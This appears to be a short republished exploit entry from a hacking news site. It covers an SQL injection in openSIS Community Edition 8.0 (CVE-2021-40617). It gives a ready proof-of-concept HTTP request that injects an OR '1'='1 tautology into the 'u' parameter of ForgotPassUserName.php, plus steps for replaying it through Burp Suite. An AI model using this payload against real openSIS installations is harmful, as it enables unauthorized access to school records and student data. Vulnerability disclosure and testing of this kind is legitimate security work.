Hacking

openSIS Community Edition 8.0 – SQL Injection

Author7 hours ago01 mins

# Exploit Title: openSIS Community Edition 8.0 - SQL Injection 
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/OS4ED/openSIS-Classic
# Software Link: https://github.com/OS4ED/openSIS-Classic
# Version: 8.0 
# Tested on: Windows
# CVE : CVE-2021-40617


Proof Of Concept
GET /ForgotPassUserName.php?used_for=username&u=test%27%20OR%20%271%27%3D%271&user_type=student HTTP/1.1
Host: opensis
Connection: close



Steps to Reproduce
Login as an admin user.
Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
Observe the result

Source link